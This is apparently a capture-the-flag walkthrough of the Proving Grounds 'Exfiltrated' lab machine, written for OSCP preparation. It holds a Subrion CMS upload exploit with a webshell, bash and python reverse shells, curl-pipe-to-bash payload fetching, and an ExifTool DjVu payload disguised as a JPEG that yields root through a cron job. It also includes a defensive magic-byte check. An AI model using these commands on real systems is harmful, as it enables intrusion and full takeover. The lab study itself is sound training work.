Proving Grounds: Exfiltrated

Today we will take a look at Proving Grounds: Exfiltrated. I am sharing this post to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Subrion CMS — Open Source Content Management System
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-title: Home :: Powered by Subrion 4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the target to the hosts file.

└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.250.163 exfiltrated.offsec

http://exfiltrated.offsec/panel/

Check the default credentials

admin:admin

Look for an exploit matching the CMS version

└─# searchsploit Subrion CMS 4.2.1
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
└─# searchsploit -m php/webapps/49876.py
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: Y1pnLHaAFll0W1VUW6I7bD0XPpc0iJJ719ZVspL5
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: kobwkomavbmiyio
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/kobwkomavbmiyio.phar
$ whoami
www-data

I get a reverse shell again to upgrade the shell

└─# cat exploit.sh 
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.250/4242 0>&1
└─# python3 -m http.server 80
$ curl 192.168.49.250/exploit.sh | bash
└─# nc -nvlp 4242
listening on [any] 4242 ...
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.163] 51084
bash: cannot set terminal process group (897): Inappropriate ioctl for device
bash: no job control in this shell
www-data@exfiltrated:/var/www/html/subrion/uploads$
python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
Ctrl + z
stty raw -echo ; fg
reset
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab
* * * * * root bash /opt/image-exif.sh
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\n metadata directory cleaned! \n\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\n Processing EXIF metadata now... \n\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\n\n Processing is finished! \n\n\n"
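A hardening note, as an added example that is not the box's script: the cron job selects files by the string "jpg" in the file name only, so any file dropped into the web-writable uploads directory with that name is handed to exiftool as root. Checking the magic bytes before processing rejects renamed containers of other formats; `is_jpeg`, `safe_jpeg_list` and `make_sample_dir` are names introduced here, and the sample directory is constructed.

```bash
#!/bin/bash
# Added example, not the box's /opt/image-exif.sh: trust file content, not the
# ".jpg" extension, before passing anything to exiftool.
# Assumes head, od, tr and mktemp are available (POSIX environment).

# is_jpeg FILE -> returns 0 if FILE starts with the JPEG SOI marker FF D8 FF
is_jpeg() {
    magic=$(head -c 3 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "ffd8ff" ]
}

# safe_jpeg_list DIR -> prints the base names of regular *.jpg files in DIR whose
# content is actually a JPEG; anything else is logged to stderr and skipped.
# A cron job would pass only these names on to exiftool.
safe_jpeg_list() {
    dir=$1
    for f in "$dir"/*.jpg; do
        [ -f "$f" ] || continue
        if is_jpeg "$f"; then
            printf '%s\n' "${f##*/}"
        else
            printf 'skipping %s: not a JPEG by magic bytes\n' "$f" >&2
        fi
    done
}

# make_sample_dir -> builds a constructed uploads directory (prints its path):
# one JPEG/JFIF header, one DjVu container renamed to .jpg (DjVu files begin
# with "AT&TFORM"), and one plain-text file named .jpg.
make_sample_dir() {
    d=$(mktemp -d)
    printf '\377\330\377\340JFIF' > "$d/photo.jpg"
    printf 'AT&TFORMDJVU'         > "$d/exploit.jpg"
    printf 'just text'            > "$d/notes.jpg"
    printf '%s\n' "$d"
}
```

Running `safe_jpeg_list "$(make_sample_dir)"` prints only `photo.jpg`; the other two names are reported on stderr and never reach exiftool.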

Check the ExifTool version

www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver
11.88

https://www.exploit-db.com/docs/49881

┌──(root㉿kali)-[~/ctf]
└─# sudo apt-get update && sudo apt-get install -y djvulibre-bin
└─# cat shell.sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.250",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
└─# cat exploit
(metadata "\c${system ('curl 192.168.49.250/shell.sh | bash')};")
└─# djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
└─# mv exploit.djvu exploit.jpg
└─# nc -nvlp 4444

On the target machine

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.49.250/exploit.jpg

After a few minutes, once the cron job has run over the uploads directory

└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.163] 48712
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."

Al1z4deh:~# echo "eJPT, CEH, OSCP"